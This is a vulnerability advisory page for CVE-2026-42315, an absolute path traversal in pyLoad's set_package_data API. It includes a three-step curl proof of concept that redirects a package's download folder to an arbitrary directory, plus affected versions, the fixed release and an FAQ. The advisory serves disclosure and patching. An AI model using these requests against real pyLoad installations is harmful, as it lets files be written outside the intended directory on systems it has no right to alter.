CVE-2026-42315: pyLoad: Path Traversal via Package Folder Name in set_package_data

Published May 5, 2026
·
Updated

Summary No sanitization of package folder name allows writing files anywhere outside the intended download directory.

Affected Component - src/pyload/core/api/init.py - Function: setpackagedata()

Details When passing a folder name in the setpackagedata() API function call inside the data object with key "folder", there is no sanitization at all, allowing a user with Perms.MODIFY to specify arbitrary directories as download locations for a package.

PoC 1) Create a package, note response package ID e.g. 5 curl -X 'POST' \ 'http://localhost:8000/api/addpackage' \ -H 'accept: application/json' \ -H 'X-API-Key: <valid api key>' \ -H 'Content-Type: application/json' \ -d '{ "name": "setpackagedataexploitpoc", "links": [ "http://example.com/file.txt" ], "dest": 1 }'

2) Call setpackagedata for this package ID with an arbitrary directory curl -X 'POST' \ 'http://localhost:8000/api/setpackagedata' \ -H 'accept: /' \ -H 'X-API-Key: <valid api key>' \ -H 'Content-Type: application/json' \ -d '{ "packageid": 5, "data": { "folder": "/users/root/" } }'

3) New download folder will be set without any checks curl -X 'GET' \ 'http://localhost:8000/api/getqueue' \ -H 'accept: application/json' \ -H 'X-API-Key: <valid api key>' Response: [ { "pid": 5, "name": "setpackagedataexploitpoc", "folder": "/users/root/", "site": "", "password": "", "dest": 1, "order": 1, "linksdone": 0, "sizedone": 0, "sizetotal": 0, "linkstotal": 1, "links": null, "fids": null } ]

Impact Allows Absolute Path Traversal to write in an arbitrary directory as long as the pyLoad process has write access.

Other sources

pyLoad is a free and open-source download manager written in Python. Prior to 0.5.0b3.dev100, when passing a folder name in the setpackagedata() API function call inside the data object with key "folder", there is no sanitization at all, allowing a user with Perms.MODIFY to specify arbitrary directories as download locations for a package. This vulnerability is fixed in 0.5.0b3.dev100.

— MITRE

Affected Software

2 affected componentsFixes available
pip/pyload-ng<=0.5.0b3.dev99
0.5.0b3.dev100
Pyload-ng Project Pyload-ng Python<0.5.0b3.dev100

Event History

May 5, 2026
Advisory Published
via GitHub·09:18 PM
Data Sourced
via GitHub·09:18 PM
DescriptionSeverityWeaknessAffected Software
May 11, 2026
CVE Published
via MITRE·04:35 PM
Data Sourced
via MITRE·04:35 PM
DescriptionSeverityWeakness
Data Sourced
via NVD·06:16 PM
DescriptionSeverityWeaknessAffected Software

Frequently Asked Questions

1

What is the severity of CVE-2026-42315?

CVE-2026-42315 is rated as a high severity vulnerability due to its potential for file system manipulation.

2

How do I fix CVE-2026-42315?

To fix CVE-2026-42315, update the pyload-ng package to version 0.5.0b3.dev100 or later.

3

What components are affected by CVE-2026-42315?

CVE-2026-42315 affects the `set_package_data()` function in `src/pyload/core/api/__init__.py`.

4

What type of vulnerability is CVE-2026-42315?

CVE-2026-42315 is a path traversal vulnerability that allows writing files outside the intended directory.

5

How can CVE-2026-42315 affect my system?

Exploitation of CVE-2026-42315 could lead to unauthorized file access or modification on your system.

Contact

SecAlerts Pty Ltd.
132 Wickham Terrace
Fortitude Valley,
QLD 4006, Australia
info@secalerts.co
By using SecAlerts services, you agree to our services end-user license agreement. This website is safeguarded by reCAPTCHA and governed by the Google Privacy Policy and Terms of Service. All names, logos, and brands of products are owned by their respective owners, and any usage of these names, logos, and brands for identification purposes only does not imply endorsement. If you possess any content that requires removal, please get in touch with us.
© 2026 SecAlerts Pty Ltd.
ABN: 70 645 966 203, ACN: 645 966 203